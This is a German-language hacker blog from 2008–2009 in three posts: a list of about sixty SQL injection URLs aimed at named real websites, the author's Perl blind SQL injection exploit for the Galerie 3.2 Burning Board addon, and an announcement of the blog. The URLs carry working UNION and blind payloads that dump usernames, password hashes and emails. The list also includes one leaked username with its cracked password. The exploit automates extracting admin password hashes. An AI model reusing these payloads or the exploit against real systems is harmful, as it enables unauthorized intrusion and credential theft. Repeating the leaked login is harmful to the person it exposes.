Ein paar SQL Injections

Hi,

da im August/September 2008 Ferien waren und ich dort genug Zeit hatte ein paar SQL Injections zu machen und zu ueben ist hier ne kleine Liste. Da die SQL Injections wie gesagt vom August/September 2008 sind, weiß ich nicht genau ob die meisten davon schon gefixxt sind 🙂

http://www.kidtokid.com/news.php?id=-13/**/UNION/**/SELECT/**/unhex(hex(version())),unhex(hex(concat_ws(0x3a,username,user_password))),3,4,5,6,7,8,9/**/FROM/**/kidtokid_com_phpbb.users/**/limit/**/1,1/*
http://www.kidtokid.com/news.php?id=-13/**/UNION/**/SELECT/**/unhex(hex(version())),unhex(hex(concat_ws(0x3a,login,pass))),3,4,5,6,7,8,9/**/FROM/**/kidtokid_com_site.stores/*
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,name,username,email,password),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_1.mos_users--
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,name,pw),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_1.users/**/limit/**/1,1--
http://www.fc-weilersbach.de/cms/_content/detail.php?nr=-2768/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,email,passwd),5,6,7,8,9,10,11,12,13/**/FROM/**/usr_web1410_2.fc1_user--
http://www.schnittberichte.com/schnittbericht.php?ID=-4539+union+select+concat_ws(0x3a,user_id,username,user_password)/**/FROM/**/sc003clu_forum.phpbb_users/**/LIMIT/**/1,1/*
http://www.squadhouse.de/index.php?id=56&srid=-9/**/UNION/**/SELECT/**/version(),2,3,4,5,concat_ws(0x3a,uid,username,pass,email),7,8/**/FROM/**/sqhdatabasev3.user_main--&ac=details 
http://www.versalia.de/forum/beitrag.php?board=v_forum&thread=-3617%27)/**/UNION/**/SELECT/**/concat_ws(0x3a,username,password,email),2,3,4/**/FROM/**/xc_users/**/LIMIT/**/1,1/*
http://www.aktionbildung.de/seiten/newslesen.php?id=-91+union+select+1,2,3,concat_ws(0x3a,username,password,email)+from+forums_auth--
http://royal-esports.de/index.php?section=wars_detail&match_id=-43%27/**/UNION/**/SELECT/**/1,2,3,4,nick,password,email,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/**/FROM/**/lh_member--+
http://www.chaoskrieger.com/downloads.php?action=filedetails&fileid=-36'/**/UNION/**/SELECT/**/1,2,password,concat_ws(0x3a,username,password),5,email,7,8,9,10,11,12/**/FROM/**/bb1_users/**/WHERE/**/userid=6--+
http://www.die-webber.com/downloads.php?action=filedetails&filepid=-10%27/**/UNION/**/SELECT/**/1,version(),username,pass/**/FROM/**/dw_users/**/LIMIT/**/0,1/*
http://sdf.die-webber.com/index2.php?content=members&action=details&id=-34/**/UNION/**/SELECT/**/1,2,version(),4,5,6,email,8,9,10,11,user,13,14,15,16,17,18,19,20,21,pass,23,24,25,26,27,28,29,30/**/FROM/**/sdf_users/**/LIMIT/**/0,1/*
http://www.counter-strike.de/modules/screenorama/gallery.php?katwahl=-5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.die-webber.com/downloads.php?action=filedetails&filepid=-10%27/**/UNION/**/SELECT/**/1,version(),username,pass/**/FROM/**/dw_users/**/LIMIT/**/0,1/*
http://sdf.die-webber.com/index2.php?content=members&action=details&id=-34/**/UNION/**/SELECT/**/1,2,version(),4,5,6,email,8,9,10,11,user,13,14,15,16,17,18,19,20,21,pass,23,24,25,26,27,28,29,30/**/FROM/**/sdf_users/**/LIMIT/**/0,1/*
http://www.counter-strike.de/modules/screenorama/gallery.php?katwahl=-5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,unhex(hex(version())),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.kleinsche-flasche.de/admin/detail.php?id=-10/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.mrgame.de/gamedownload2.php?id=-375/**/UNION/**/SELECT/**/1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19/*
http://www.mrgame.de/gamedownload2.php?id=-375/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,username,user_password,user_email),7,8,9,10,11,12,13,14,15,16,17,18,19/**/FROM/**/usr_wsa17_2.mrgame_phpbb_users/**/LIMIT/**/1,1/*
MD5 - a4ae46449f1074967bb1376d81335f69
gdataonline.com	89024703
http://www.sixpacks.org/index.php?page=showquiz&qid=-103/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://gameresource.de/out.php?news=-104999/**/UNION/**/SELECT/**/1,2,VERSION(),0x27,0x27,0x27,7,8,9,10,11,12/*
http://www.gamaxx.de/send.php?news=-19494/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,unhex(hex(concat_ws(0x3a,username,password,salt,email))),10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/foren_user/*
http://bgs.gdynamite.de/send.php?news=-8727/**/UNION/**/SELECT/**/1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.zocko.de/forum/galerie.php?action=show&pic=10%27%20and%20ascii(substring((SELECT%20password%20from%20bb1_users%20limit%200,1),32,1))=54/*
User: BartTheDevil89
PW: 72bb3fc06c63e9ad6957d81747fc29f6 = randy01
http://www.finanzsoftware24.de/download.php?id=-381/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,username,user_password,user_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/**/FROM/**/biusoft_forum.phpbb_users/**/LIMIT/**/1,1--
http://zidz.com/munity_user.php?me=1%27/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,version(),concat_ws(0x3a,nic,pass),51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/**/FROM/**/user/**/LIMIT/**/1,1/*&show=steckbrief
http://www.radioquintessenz.de/djs.php?id=-1/**/UNION/**/SELECT/**/1,2,3,version(),5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/FROM/**/qe_forum.bb1_users--
http://www.luftfahrt.net/flugzeuge/flugzeug.php?id=-6/**/UNION/**/SELECT/**/1,concat_ws(0x3a,email,passwort),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/**/FROM/**/members/**/LIMIT/**/0,1/*
http://www.wochenspiegel-saarland.de/index.php?id=43&doc=-81980/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,unhex(hex(version())),12,13,14,15,16,17,18,19,20,21,22,23/*
http://www.radio7.de/moderatorsDetail.php?mid=-12/**/UNION/**/SELECT/**/1,unhex(hex(concat_ws(0x3a,loginname,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/admin_user/*
http://www.gamecaptain.de/download.php?id=-4744/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password,salt),10,11,12,13,14,15,16,17,18/**/FROM/**/vbb_user/**/LIMIT/**/1,1--
http://www.serienoldies.de/gb/kommentar.php?id=-6178/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,username,pwd,email),7,8,9,10,11,12,13/**/FROM/**/pfuser/*
http://www.keindsl.de/kommentar.php?id=-541/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,username,user_password),7,8,9,10,11,12,13/**/FROM/**/phpbb_beta_5_users/**/LIMIT/**/1,1/*
http://www.gameradio.de/kommentar.php?news_id=-90/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10/*
http://www.jugendbibliothek-gera.7to.de/pgb/kommentar.php?id=-21/**/UNION/**/SELECT/**/1,2,3,4,version(),unhex(hex(concat(name,0x3a,passwort))),7,8,9,10,11,12,13,14,15/**/FROM/**/yuri_user/*
http://gaestebuch.ruebenlauf.de/kommentar.php?id=-117/**/UNION/**/SELECT/**/1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15/*
http://www.infoportal24.org/kommentar.php?id=-4397%27/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7/*
http://www.fg-schwingenheuer.de/blog/kommentar.php?id=-125/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,version(),12,13,concat_ws(0x3a,benutzer,passwort),15,16,17,18,19,20/**/FROM/**/usr_web148_2.login/*
http://www.subba-cultcha.com/article_feature.php?id=-5420/**/UNION/**/SELECT/**/1,concat(email,0x3a,password),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/users/*
http://gw.buffed.de/daten/bosse/index.php?kapitel=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,password,email,icq,salt),5+FROM+user+LIMIT+0,1
http://www.ka-nightlife.de/locations.php?id=-5/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/**/from/**/bb1_users/**/limit/**/0,1&sid=
http://trekstor.de/de/products/detail_mp3.php?pid=-88/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.freebooknotes.com/book.php3?id=-32/**/UNION/**/SELECT/**/1,2,3,version()--
http://www.heavymetal.dk/links_bands_view.php?id=-286)/**/UNION/**/SELECT/**/1,2,version(),concat_ws(0x3a,username,password,email),5,6,7,8,9,10,11,12/**/FROM/**/users--
http://www.gamingguide.de/forum/index.php?page=XboxRanking&sortField=10%20and%20if(substring((select%20table_name%20from%20information_schema.tables%20limit%200,1),1,1)=0x43,NULL,(select%201%20union%20select%202))&sortOrder=ASC
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,UserName,UserPass),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.test_scout_users/*
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,username,user_password,user_email),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.forum_users/**/LIMIT/**/1,1/*
http://boutiqueportal.com/index.php?main_page=customer_testimonials&testimonial_id=-1/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,admin_name,admin_pass,admin_email),version(),5,6,7,8/**/FROM/**/zen_admin/*
http://www.sbcommunicationsgroup.com/media-info.php?id=-1/**/UNION/**/SELECT/**/1,2,3,version()/*
http://choices.de/kritik.php?id=122563/**/UNION/**/SELECT/**/1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
http://www.larsie.de/include.php?path=vote/archiv.php&vid=5%27)/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user_name,user_pw),3,4,5,6,7,8,9,10,11/**/FROM/**/sun25_usr_web201_3.phpkit_1_user+--+
------------
Dezember 2008:
 
http://www.clanscripte.net/main.php?content=newskommentare&action=view&newsid=-570/**/UNION/**/SELECT/**/1,version(),concat_ws(0x3a,name,pwd,email),4,5,6/**/FROM/**/csportal_users--
http://www.handit.de/index.php?fuseaction=detail&produktid=-5333+group%20by%20null+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19/*
http://privatamateure.com/show_message.php?messageid=-7016123/**/UNION/**/SELECT/**/1,2,3,version(),unhex(hex(concat_ws(0x3a,nickname,email,password))),6,7,8,9,10/**/FROM/**/user/*&kind=1
http://sig-box.de/?typ=tag&s=search&add=add&search=0%27%20UNION%20SELECT%200x27756E696F6E2073656C65637420312C322C332C342C352C362C76657273696F6E28292C382023,2%20--+

Mein erstes Exploit

Hi,

hier ist mein Erstes Exploit, welches bei milw0rm am 05.10.2008 veroeffentlicht wurde 🙂

Nochmal vielen lieben Dank an electron1x fuer seine große Hilfe an diesem Exploit, ohne ihn haette ich das bestimmt nicht (so schnell) geschafft! 🙂

Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection Exploit

#!/usr/bin/perl
#####################################################################################
#
#    Galerie 3.2 (galerie.php) Remote "Blind" SQL Injection
#
#    found by: J0hn.X3r
#    exploit written by: J0hn.X3r and electron1x
#    Date:     05.10.2008
#    Dork: "Galerie 3.2 © 2004 by progressive"
#
#    Contact:
#       J0hn.X3r
#            [+] ICQ:   573813
#            [+] Mail:  J0hn.X3r[at]gmail.com
#       electron1x
#            [+] Mail:  electron1x *at* mail *dot* ru
#
#    Greetz to: nexos, Barbers, -tmh-, Patrick_B, Sector, Loader007, n00bor
#               Mac_Hack, Five-Three-Nine, f0Gx, bizzit, h0yt3r, no_swear_ftW,
#               Lidloses_Auge, Sys-Flaw, Free-hack, Universal Crew & rest :-)
#
#####################################################################################
#
#  First, Galerie 3.2 is an addon for Burning Board Lite.
#
#  http://www.site.com/galerie.php?action=show&pic=10
#
#  If we add a ' to the pic id we get an SQL Error. But the Query is an UPDATE Query, so we can't use UNION.
#
#  We have to try it with a Blind SQL Injection.
#  ( that slow and shitty subquery thingy ;) )
#
#  injection:
#  http://www.site.com/galerie.php?action=show&pic=10'/**/and/**/ascii(substring((SELECT/**/password/**/from/**/bb1_users/**/WHERE/**/userid=1),1,1))>1/*
#
#####################################################################################
 
use strict;
use warnings;
use LWP::UserAgent;
 
banner();
 
my $url = shift || usage($0);
my $usr_id  = shift;
my $keyspace = "0123456789abcdef";
 
$usr_id = 1 unless ( $usr_id and $usr_id =~ /^\d+$/ );
$url    = 'http://' . $url unless ( $url =~ /^https?:\/\/.+?\/$/ );
 
 
# global vars...
our @url          = ( "$url/galerie.php?action=show&pic={id}%27+and+ascii(substring((SELECT+password+from+bb2_users+where+userid=$usr_id),1,1))", '', '/*' );
our $ua           = LWP::UserAgent->new;
$ua->agent('Mozilla/4.8 [en] (Windows NT 6.0; U)'); # btw we dont use windows ..
 
# regexes..
our $regex        = 'Bild\ \d+\ von\ (\d+)';
my  $prefix_regex = '(\w+)_galeriedata';
my  $regex_id     = 'pic=(\d+)';
 
my  $prefix       = '';
my  $pic_id       = '';
 
print "[~] Preparing attack...\n";
my $r = $ua->get($url . "/galerie.php?action=show&pic=%27");
        die   "\t[!!] Couldnt connect to $url!\n"             unless ( $r->is_success );
        die   "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /$prefix_regex/ );
        print "\t[*] Target seems to be vulnerable\n";
        $prefix = $1;
        $url[0] =~ s/bb2/$prefix/;
 
$r    = $ua->get($url . "/galerie.php");
        die   "\t[!!] Couldnt get a valid pic-id\n" unless ( $r->content =~ /$regex_id/ );
        $pic_id = $1;
        $url[0] =~ s/{id}/$pic_id/;
 
        print "\t[*] Using table prefix $prefix\n";
        print "\t[*] Using pic-id $pic_id\n";
 
 
print "[~] Unleashing Black Magic...\n";
        print STDERR "\t[*] Getting Hash "; 
 
 
for ( 1..32 ) {
        $url[0] =~ s/\),\d{1,2},/\),$_,/;
        blind( build_array($keyspace), 0, 16);
}
print "\n";
 
 
 
sub banner
{
        print "[~] Galerie 3.2 WBB Lite Addon Blind SQL-Injection Exploit\n";
        print "[~] Written by J0hn.x3r and electron1x\n\n"
}
 
sub usage
{
        my $script = shift;
        print "[*] Usage\n" ,
                        "\t$script <host> <opt: user id>\n" ,
                        "\tuser id defaults to 1\n" ,
              "[*] Examples\n" ,
                        "\t$script http://example.com/forum/ 2\n" ,
                        "\t$script localhost/board/\n" ,
                        "\t$script localhost 31337\n";
        exit(0);
}
 
 
 
sub blind
{
        my ( $keyspace,  $bottom, $top ) = @_;
        my $center = int ($bottom+$top)/2;
        print STDERR chr $$keyspace[$center];
        if ( request($$keyspace[$center], '=')) {
                return;
        } elsif ( $top-$bottom > 0) {
                        print STDERR "\b";
                        return blind($keyspace, $center+1, $top   )
                                unless  (  request($$keyspace[$center], '<') );
                        return blind($keyspace, $bottom, $center-1);
        } else {
                print STDERR "\n[!!] Something went wront, dunno what..\n";
                exit(1);
        }
}
 
sub build_array
{
        my @sorted = sort {$a<=>$b} map {ord} $_[0] =~ /./g;
        return \@sorted;
}
 
 
sub request
{
        my ( $key, $flag ) = @_;
        my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]);
        $r->content =~ /$regex/;
        return ($1 > 0);
}
 
__END__
 
# milw0rm.com [2008-10-05]

Exploit Link: http://milw0rm.com/exploits/6675

Author Link: http://milw0rm.com/author/1639

Blog eroeffnet!

Heyho,

So nun endlich nach 13 Tagen verspaetung wird auch mein Blog eroeffnet. Anfangs war ja der 1.1.2009 das Startdatum jedoch hatte mein Hoster *hust* Probleme mit dem Server. Nachdem ich dann noch warten musste wegen Moneybookers  und der Domain hatte das auch wieder Tage gedauert. Nun heute nach 13 Tagen scheint fast alles zu laufen 🙂 Gehostet wird bei Sebo (vielen lieben Dank hierfuer), da ich vollstes Vertrauen in seiner Arbeit habe.

Was erwartet euch hier?

Wie unschwer zu erkennen, wird es hier vorallem um Web Vulnerabilites gehen, also wie fuehre ich SQL Injections durch (ausfuehrliches selfmade Einsteiger Tutorial wird folgen), XSS warum werden hier “scripte” ausgefuehrt und einiges mehr 🙂 Wird hoffentlich interessant fuer euch, vllt vorallem fuer Anfaenger. Auch interessante Exploits, selbstgeschrieben Exploits, “Szene News” und interessante Sicherheitsluecken auf Websiten welche von mir gefunden wurden, werden hier veroeffentlicht.

Ich hoff das euch mein Blog gefaellt bzw gefallen wird, bin fuer Feedback immer offen und hoffe ihr schaut regelmaessig vorbei 🙂

J0hn.X3r

P.S.: Falls ihr hier seid wegen Carding, Faking, CC’s oder aehnlichem geht bitte auf das X rechts oben, denn hier seid ihr dann Falsch! 😉